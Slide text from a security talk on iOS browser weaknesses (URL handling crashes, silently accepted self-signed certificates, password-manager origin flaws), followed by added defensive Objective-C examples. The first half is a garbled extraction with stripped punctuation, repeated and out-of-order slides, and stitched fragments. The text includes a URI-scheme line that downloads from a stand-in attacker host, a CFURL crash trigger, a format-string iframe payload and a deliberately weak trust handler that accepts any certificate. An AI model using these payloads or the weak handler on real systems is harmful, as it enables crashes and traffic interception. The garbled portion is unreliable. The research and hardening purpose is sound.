bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
Popups & URL handling: CFURL Null Pointer Dereference
• Any CFURL function that gets NULL as an argument will cause a Null Pointer Dereference. CFURLCreateWithString (and +[NSURL URLWithString:]) returns NULL/nil for a string it cannot parse, and CFURL functions do not check their argument, so a browser that passes the result straight on crashes on attacker-chosen input.
• Tested with malformed percent-encoding in the URL: http://%, http://%5, http://%5c, etc.
• Example (Opera Coast): <script>document.location = 'http://%5c'</script>

Opera Coast, in the debugger:
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x00000000
0x2f3e0d76 in CFURLCopyPath ()
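The check a browser needs at this boundary, as an added example that is not part of the presentation and not code from any of the browsers it tested. It assumes only Foundation/CoreFoundation and ARC; the sample URL strings are constructed, and which of them CFURL rejects is decided by CFURL at run time, not by the example.

```objectivec
#import <Foundation/Foundation.h>
#import <CoreFoundation/CoreFoundation.h>

// Returns the path component of urlString, or nil when CFURL will not parse it.
// CFURLCreateWithString returns NULL for strings it cannot parse, and CFURL
// functions do not check their argument: CFURLCopyPath(NULL) is the
// EXC_BAD_ACCESS at address 0x00000000 shown on the Opera Coast slide.
// (Compile with ARC; the __bridge casts assume it.)
static NSString *SafeCFURLPath(NSString *urlString) {
    if (urlString == nil) {
        return nil;                         // a nil NSString would reach CFURL as NULL too
    }
    CFURLRef url = CFURLCreateWithString(kCFAllocatorDefault,
                                         (__bridge CFStringRef)urlString, NULL);
    if (url == NULL) {
        return nil;                         // rejected: never handed to CFURLCopyPath
    }
    CFStringRef path = CFURLCopyPath(url);  // NULL when the URL has no path component
    NSString *result = path ? (__bridge_transfer NSString *)path : @"";
    CFRelease(url);
    return result;
}

// The same guard on the UIWebViewDelegate path: WebKit accepts URLs that CFURL
// rejects, so request.URL can be nil by the time shouldStartLoadWithRequest
// sees it. Refuse the navigation instead of passing the nil on to CF code.
static BOOL NavigationURLIsUsable(NSURLRequest *request) {
    return request.URL != nil && SafeCFURLPath(request.URL.absoluteString) != nil;
}

int main(int argc, char *argv[]) {
    @autoreleasepool {
        // Constructed inputs: one ordinary URL plus the malformed percent-escapes
        // from the slide. Anything CFURL rejects comes back as nil, not as a crash.
        NSArray *samples = @[ @"http://example.com/login?next=/account",
                              @"http://%", @"http://%5", @"http://%5c" ];
        for (NSString *s in samples) {
            NSString *path = SafeCFURLPath(s);
            NSLog(@"%@ -> %@", s, path ? path : @"rejected by CFURL");
        }
    }
    return 0;
}
```

The point is where the NULL check sits: before any CFURL call, on every string that originates from page content (document.location, a link, a redirect), because CFURL is stricter than WebKit's own parser and the two disagree on exactly the inputs an attacker can choose.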
Popups & URL handling: special guest star
• Safari on OS X Mavericks before Security Update 2014-002 (CVE-2014-1315): a format string issue in URL handling, reachable from a web page by framing a URL with an unregistered scheme whose "path" is the format string
<iframe src="lets-try-format-string:%p%p%p%p…">
In this presentation
• iOS Browsers: UIWebView, WKWebView
• Address Bar Spoofing
• Universal Cross-Site Scripting
• Popups & URL handling
• SSL & password managers
SSL & password managers: SSL
• By default, a UIWebView rejects https requests with invalid certificates, without user interaction
• This can be changed (e.g. to let a user accept a self-signed certificate): UIWebView has no certificate API, so the app replays the request with NSURLConnection, handles the server-trust challenge itself and then tells the web view to proceed
• 14 of the tested browsers: self-signed SSL certificates are silently accepted
• In some cases the validation is done for the main domain only (e.g. Opera Coast < 3.02): only the main document's host is checked, other hosts the page loads are not
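What the replayed NSURLConnection's trust handling should look like, as an added example that is not code from the presentation or from any of the browsers it tested. The weak variant is the silent-accept pattern the slide describes, shown only as the contrast; the class name, the in-memory exception store and the `weakHandleChallenge:` method are assumptions made for the illustration.

```objectivec
#import <Foundation/Foundation.h>
#import <Security/Security.h>
#import <CommonCrypto/CommonDigest.h>

// SHA-256 of the leaf certificate: the key under which a user-approved
// exception is stored, so the exception covers one certificate on one host.
static NSString *LeafFingerprint(SecTrustRef trust) {
    SecCertificateRef leaf = SecTrustGetCertificateAtIndex(trust, 0);
    NSData *der = (__bridge_transfer NSData *)SecCertificateCopyData(leaf);
    unsigned char digest[CC_SHA256_DIGEST_LENGTH];
    CC_SHA256(der.bytes, (CC_LONG)der.length, digest);
    NSMutableString *hex = [NSMutableString stringWithCapacity:2 * CC_SHA256_DIGEST_LENGTH];
    for (int i = 0; i < CC_SHA256_DIGEST_LENGTH; i++) {
        [hex appendFormat:@"%02x", digest[i]];
    }
    return hex;
}

@interface TrustPolicy : NSObject <NSURLConnectionDelegate>
// host -> leaf fingerprint the user explicitly accepted (hypothetical store, in memory)
@property (nonatomic, strong) NSMutableDictionary *acceptedExceptions;
@end

@implementation TrustPolicy

// WEAK: the pattern behind "self-signed certificates are silently accepted".
// Every server trust is turned into a credential; nothing is evaluated.
- (void)weakHandleChallenge:(NSURLAuthenticationChallenge *)challenge {
    NSURLCredential *cred =
        [NSURLCredential credentialForTrust:challenge.protectionSpace.serverTrust];
    [challenge.sender useCredential:cred forAuthenticationChallenge:challenge];
}

// HARDENED: system evaluation against the host actually being connected to;
// on failure, proceed only for a certificate the user already accepted for
// exactly this host; otherwise fail closed. No "main domain" shortcut: the
// delegate runs per connection, so each host is judged on its own certificate.
- (void)connection:(NSURLConnection *)connection
    willSendRequestForAuthenticationChallenge:(NSURLAuthenticationChallenge *)challenge {
    NSURLProtectionSpace *space = challenge.protectionSpace;
    if (![space.authenticationMethod isEqualToString:NSURLAuthenticationMethodServerTrust]) {
        [challenge.sender performDefaultHandlingForAuthenticationChallenge:challenge];
        return;
    }
    SecTrustRef trust = space.serverTrust;
    SecPolicyRef policy = SecPolicyCreateSSL(true, (__bridge CFStringRef)space.host);
    SecTrustSetPolicies(trust, policy);
    CFRelease(policy);

    SecTrustResultType result = kSecTrustResultInvalid;
    OSStatus status = SecTrustEvaluate(trust, &result);
    BOOL valid = (status == errSecSuccess) &&
                 (result == kSecTrustResultUnspecified || result == kSecTrustResultProceed);
    if (!valid) {
        NSString *fingerprint = LeafFingerprint(trust);
        valid = [self.acceptedExceptions[space.host] isEqualToString:fingerprint];
    }
    if (valid) {
        [challenge.sender useCredential:[NSURLCredential credentialForTrust:trust]
             forAuthenticationChallenge:challenge];
    } else {
        // Invalid and not an explicit, host-scoped exception. The UI may now ask
        // the user and, only if they accept, store the fingerprint under space.host.
        [challenge.sender cancelAuthenticationChallenge:challenge];
    }
}
@end
```

Two things to test in a browser that uses this trick: that an exception accepted for one host is not reused for another host (or for a different certificate on the same host), and that hosts the page loads beyond the main document are covered at all, since the NSURLConnection replay only sees the navigations that reach shouldStartLoadWithRequest. WKWebView removes the replay: its navigation delegate receives the challenge directly in webView:didReceiveAuthenticationChallenge:completionHandler:, and the same evaluate-then-exception decision goes there.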
SSL & password managers: Password managers
• The autofill JavaScript runs with the privileges of the top frame → passwords are not filled into subframes (stringByEvaluatingJavaScriptFromString has no access to frames from another origin)
• Usually possible to force saving a password for another domain (with or without user interaction): the browser ends up storing an entry under a domain the attacker's page chose
• Password filling checks the domain but not always the URL scheme (https vs http): an entry saved on https://example.com is also filled on http://example.com, where a network attacker can read it
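The save and fill decisions keyed on a full origin, as an added example that is not code from the presentation or from any of the browsers it tested. It covers both findings on the slide: an entry is stored only under the origin of the top document the user typed into, and it is filled only into the top frame when scheme, host and port all match. The function names and the sample URLs are constructed for the illustration.

```objectivec
#import <Foundation/Foundation.h>

// Canonical origin "scheme://host:port" (lowercase, default port made explicit),
// or nil when the URL is not a usable http(s) URL. Saved credentials are keyed
// by this string, never by domain alone.
static NSString *OriginForURL(NSURL *url) {
    NSString *scheme = url.scheme.lowercaseString;
    if (scheme == nil || url.host == nil) return nil;
    if (![scheme isEqualToString:@"https"] && ![scheme isEqualToString:@"http"]) return nil;
    NSNumber *port = url.port ?: ([scheme isEqualToString:@"https"] ? @443 : @80);
    return [NSString stringWithFormat:@"%@://%@:%@", scheme, url.host.lowercaseString, port];
}

// Save decision. The key is the origin of the TOP document that contained the
// form (what the address bar showed), and the form's own document must be that
// same origin: a page on evil.example cannot plant an entry for bank.example
// by framing it or by pointing a form at it.
static NSString *SaveKeyForSubmission(NSURL *formDocumentURL, NSURL *mainDocumentURL) {
    NSString *formOrigin = OriginForURL(formDocumentURL);
    NSString *topOrigin  = OriginForURL(mainDocumentURL);
    if (formOrigin == nil || topOrigin == nil) return nil;
    if (![formOrigin isEqualToString:topOrigin]) return nil;   // form lives in a cross-origin frame
    return topOrigin;
}

// Fill decision. Fill only when the frame is the top document's origin and the
// stored origin matches it exactly, scheme and port included: an entry saved on
// https://bank.example is never filled on http://bank.example.
static BOOL ShouldFill(NSString *savedOrigin, NSURL *frameURL, NSURL *mainDocumentURL) {
    NSString *frameOrigin = OriginForURL(frameURL);
    NSString *topOrigin   = OriginForURL(mainDocumentURL);
    if (frameOrigin == nil || topOrigin == nil) return NO;
    if (![frameOrigin isEqualToString:topOrigin]) return NO;   // cross-origin subframe: never
    return [savedOrigin isEqualToString:frameOrigin];
}

int main(int argc, char *argv[]) {
    @autoreleasepool {
        // Constructed URLs for the three situations on the slide.
        NSURL *bankHTTPS = [NSURL URLWithString:@"https://bank.example/login"];
        NSURL *bankHTTP  = [NSURL URLWithString:@"http://bank.example/login"];
        NSURL *evil      = [NSURL URLWithString:@"https://evil.example/phish"];

        NSString *saved = SaveKeyForSubmission(bankHTTPS, bankHTTPS);
        NSLog(@"saved under: %@", saved);
        NSLog(@"save from bank form framed by evil: %@", SaveKeyForSubmission(bankHTTPS, evil));

        NSLog(@"fill, top-level https: %d", ShouldFill(saved, bankHTTPS, bankHTTPS));
        NSLog(@"fill, top-level http (scheme differs): %d", ShouldFill(saved, bankHTTP, bankHTTP));
        NSLog(@"fill, bank framed by evil: %d", ShouldFill(saved, bankHTTPS, evil));
    }
    return 0;
}
```

Run the three fill cases against a browser under test by hosting the same page over http and https and inside a cross-origin iframe; a password manager that fills in either of the last two cases has the weakness the slide describes.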
Summary
• UIWebViews should be replaced with iOS 8 WKWebViews in browser applications
• Most 3rd-party iOS browsers are experimental or side projects, built with less attention to detail
• Mobile device management and other enterprise solutions often include a browser application. Did you test it?
References
• https://developer.apple.com/library/ios/documentation/AppleApplications/Reference/SafariWebContent/
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebView_Class/Reference/Reference.html
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebViewDelegate_Protocol/Reference/Reference.html
• https://developer.apple.com/library/mac/documentation/corefoundation/Reference/CFURLRef/Reference/reference.html
• https://developer.apple.com/library/prerelease/ios/documentation/WebKit/Reference/WKWebView_Ref/index.html
• https://code.google.com/p/browsersec/
• http://www.w3.org/TR/CSP/
• http://www.slideshare.net/iphonepentest/ios-application-insecurity
• https://labs.mwrinfosecurity.com/blog/2012/04/16/adventures-with-ios-uiwebviews/
• http://www.shmoo.com/idn/
• http://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html
• http://research.microsoft.com/pubs/73101/guilogicsecurity.pdf
• http://gs.statcounter.com/
• https://code.google.com/p/chromium/issues/detail?id=146760
• https://code.google.com/p/chromium/issues/detail?id=147625
• https://code.google.com/p/chromium/issues/detail?id=324969
• https://code.google.com/p/chromium/issues/detail?id=326118
• https://code.google.com/p/chromium/issues/detail?id=326125
• https://code.google.com/p/chromium/issues/detail?id=348640
• http://blogs.opera.com/mobile/2014/05/opera-coast-updated-3-02/
• http://www.f-secure.com/en/web/labs_global/fsc-2014-4
• http://browser-shredders.blogspot.com/
• https://ios.browsr-tests.com/
Questions?
lukasz.pilorz@runic.pl, pawel.wylecial@gmail.com
Twitter: @runicpl, @h0wlu
Thank you